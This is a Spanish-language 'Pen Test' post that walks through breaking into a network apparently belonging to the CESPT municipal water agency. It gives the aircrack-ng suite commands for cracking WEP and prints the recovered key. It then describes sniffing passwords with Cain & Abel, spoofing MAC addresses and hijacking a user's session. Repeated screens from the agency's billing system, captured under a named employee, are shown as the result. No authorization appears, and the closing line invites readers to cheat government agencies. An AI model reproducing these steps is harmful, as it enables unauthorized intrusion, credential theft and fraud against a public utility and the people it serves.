Pen Test

Vamos a entrar a una Red Externa con un error muy conocido, solo se ocupa BackTrack y un Sniffer y listo ( y una que otra herramienta) Primero tenemos que ver de que forma vamos a entrar, si desde una web colándonos al web server y de ahí movernos al directorio raíz o cualquier otra forma, en este caso vamos a usar un modo muy común y muy vulnerable, vamos a penetrar la Red por WIRELESS: Es un error muy simple y a la ves muy grave, primero que nada hay que comenzar por ver el cifrado de la red, tratamos de conectarnos y nos dice que es WEP entonces metemos nuestro Live Cd y comenzamos: Seleccionamos nuestra interfaz de red que usamos para wireless: Podemos poner airmon-ng y nos muestra las interfazes disponidbles , lo siguiente es ponerlas en modo monitor, asi que ponemos: Airmon-ng start wifi0

Ahí seleccione esa wifi0 pero el script creo otra y se llama ath1 y con esa voy a inyectar. Después usamos otro script para ver que redes hay por ahi Airodump-ng ath1

Ya que vimos que redes hay, pues escogemos una y a comenzar el ataque en este caso atacaremos a una red llamada Cespt ESSID: Cespt BSSID: 00:C0:94:IF:3D:XX Airodump-ng –c 1–w tt ath1

Donde el parametro –c se refiere al canal de la red y el otro –w se refiere al nombre del archivo donde se guardaran los paquetes, en este caso se llama “etc” el archivo. Después nos tenemos que asociar con la red, para comenzar a atacar: Aireplay-ng -1 10 –a BSSIDBLANCO –h MIMACADDRESS –e NOMBREDELARED En este caso seria: Aireplay-ng -1 10 –a 00:C0:94:IF:3D:XX –h XX:XX:XX:XX:XX:XX –e Cespt

Despues a capturer paquetes mas rapido, despues de habernos asociado: Aireplay-ng -3 –b 00:C0:94:IF:3D:XX –h XX:XX:XX:XX:XX:XX

Y ya despues de cierto numero, unos 10 mil, pues a crackear par aver si nos da la clave, en este caso decia que era WEP y por lo regular te imaginas 10 numeros por que son de 128 bits, pero aqui salio otra cosa: Aircrack-ng tt-01.cap

Y listo salio la clave “1cd196121fc78c653f1d665661” son mas de 10 numeros, lo único que vario aquí fue la distancia, entre mas sercas estaba mas rápido llegaban los paquetes.

Listo ahora con la clave nos conectamos a la red y he aquí un problema, aveces me conectaba y no tenia salida a internet pero si me designaba una IP el router y me marcaba conectividad nula, con o sin Internet puedes Sniffear la Red, asi que lo siguiente ya entrando una ves a la red es sacar todos los passwords y users que veamos, en este caso vamos a usar el “cain & Abel” para ver que encontramos por ahí.

Escaneamos toda nuestra red, resolvemos los nombres de las pc y salen algunos roles, con solo saber el nombre, después los que sean plain text salen rápido

Los que no, los sacamos con el cracker agregándole wordlist

Y eso es todo, ya entramos sacamos usuarios, roles de las maquinas, algunos passwords pero ahora hay que administrar todo el sistema para ahora si tener control del servidor por completo. Debe tener métodos de autentificación, IDS, firewalls y cosas asi, asi que va a ser un poco difícil, pero no imposible, tenemos que suplantar, hacernos pasar por usuarios o comenzar a crackear los que tenemos El detalle que como es un “server” el password del administrador es el mas difícil y solo cae si el admin comete algún error Para hacer un hijack o suplantar a un usuario basta con conocer su mac y el nombre de su dominio y una que otra cosita, por ejemplo el RID Si es admin es 500 si es un invitado es 501 y todos los demás users ya con dominio dentro de la red o trabajando como “workstations” son del 1000 en adelante Agarramos a un pollo, su mac y su nombre de dominio y con una herramienta que se llama macof lo suplantamos:

Hay otro que se llama smac Que es aun mas fácil de usar y tiene GUI:

Otro mas común y corriente e igual de fácil d eusar:

Mac changer y listo, ese es el caso de entrar a la red y hacernos pasar por “alguien” pero no hijacking

Ahora, si vimos con el sniffer que hay trafico web pues vamos a suplantar a alguien, esto se puede hacer con el Hunt, el juggernaut o solarwinds y el IP monitor, esto es en caso de que halla el servicio de kerberos 5 corriendo aunque con el sniffer puedes crackear esos password y a la hora de que el firewall te pida user y password para navegar pues, los pones y ya listo a navegar y pues los resultados de suplantar: Usuario: patricia Fri Jul 17 08:36:55 CDT 2009 MENU DE CONSULTA DE CONVENIOS DE AGUA 1 2 3 0

.. .. .. ..

Duplicado de Convenios de Agua Reporte de lo Convenido por Agua Consulta de Convenios de Agua Regresar

Opcion Deseada MENU DE CAPTURISTAS DE INGRESOS 1 2 3 4 5 6 7 0

.. .. .. .. .. .. .. ..

Menu General Captura Manual P¢liza y Validaci¢n Poliza y Papeleta de Mercados Imprimir Papeleta Manual y Reporte de Efectivo Mantenimiento a Cortes P¢liza y Validaci¢n (MANUAL) Terminar

Opcion Deseada Usuario: patricia Fri Jul 17 08:36:54 CDT 2009 MENU GENERAL 1 .. Menu de Consulta de Contratos de Obra 2 .. Menu de Consulta de Convenios de Agua 3 .. Ajustes/Consulta de Historico 4 .. Control y Distribucion 5 .. Consulta de Sistema de Cajas 6 .. Consulta de Claves del Municipio 7 .. Consulta de Pagos e Historico de Factura 8 .. Reporte de Historico de Factura 9 .. Captura de Telefonos, Radio e Email 10 .. Plazos y Bitacoras de Cobranza 11 .. Validador del 15% Descto. Pronto Pago

12 .. Validador del Sorteo Amigos de CESPT 13 .. Cancelacion de cobro de APORT. CRUZ ROJA/BOMBEROS 0 .. Regresar Opcion Deseada 2 Usuario: patricia Fri Jul 17 08:36:55 CDT 2009 MENU DE CONSULTA DE CONVENIOS DE AGUA 1 2 3 0

.. .. .. ..

Duplicado de Convenios de Agua Reporte de lo Convenido por Agua Consulta de Convenios de Agua Regresar

Opcion Deseada 2 MENU DE CAPTURISTAS DE INGRESOS 1 2 3 4 5 6 7 0

.. .. .. .. .. .. .. ..

Menu General Captura Manual P¢liza y Validaci¢n Poliza y Papeleta de Mercados Imprimir Papeleta Manual y Reporte de Efectivo Mantenimiento a Cortes P¢liza y Validaci¢n (MANUAL) Terminar

Opcion Deseada 1 Usuario: patricia Fri Jul 17 08:36:54 CDT 2009 MENU GENERAL 1 2 3 4 5 6 7 8

.. .. .. .. .. .. .. ..

Menu de Consulta de Contratos de Obra Menu de Consulta de Convenios de Agua Ajustes/Consulta de Historico Control y Distribucion Consulta de Sistema de Cajas Consulta de Claves del Municipio Consulta de Pagos e Historico de Factura Reporte de Historico de Factura

9 .. Captura de Telefonos, Radio e Email 10 .. Plazos y Bitacoras de Cobranza 11 .. Validador del 15% Descto. Pronto Pago 12 .. Validador del Sorteo Amigos de CESPT 13 .. Cancelacion de cobro de APORT. CRUZ ROJA/BOMBEROS 0 .. Regresar Opcion Deseada 2 Usuario: patricia Fri Jul 17 08:36:55 CDT 2009 MENU DE CONSULTA DE CONVENIOS DE AGUA 1 2 3 0

.. .. .. ..

Duplicado de Convenios de Agua Reporte de lo Convenido por Agua Consulta de Convenios de Agua Regresar

Opcion Deseada 2 MENU DE CAPTURISTAS DE INGRESOS 1 2 3 4 5 6 7 0

.. .. .. .. .. .. .. ..

Menu General Captura Manual P¢liza y Validaci¢n Poliza y Papeleta de Mercados Imprimir Papeleta Manual y Reporte de Efectivo Mantenimiento a Cortes P¢liza y Validaci¢n (MANUAL) Terminar

Opcion Deseada 1 Usuario: patricia Fri Jul 17 08:36:54 CDT 2009 MENU GENERAL 1 2 3 4 5

.. .. .. .. ..

Menu de Consulta de Contratos de Obra Menu de Consulta de Convenios de Agua Ajustes/Consulta de Historico Control y Distribucion Consulta de Sistema de Cajas

6 .. Consulta de Claves del Municipio 7 .. Consulta de Pagos e Historico de Factura 8 .. Reporte de Historico de Factura 9 .. Captura de Telefonos, Radio e Email 10 .. Plazos y Bitacoras de Cobranza 11 .. Validador del 15% Descto. Pronto Pago 12 .. Validador del Sorteo Amigos de CESPT 13 .. Cancelacion de cobro de APORT. CRUZ ROJA/BOMBEROS 0 .. Regresar Opcion Deseada 2 Usuario: patricia Fri Jul 17 08:36:55 CDT 2009 MENU DE CONSULTA DE CONVENIOS DE AGUA 1 2 3 0

.. .. .. ..

Duplicado de Convenios de Agua Reporte de lo Convenido por Agua Consulta de Convenios de Agua Regresar

Opcion Deseada Eso es todo y por si se quieren ahorrar unos pesitos en alguna dependencia de gobierno pues, ya saben como, hacerles el chistesito.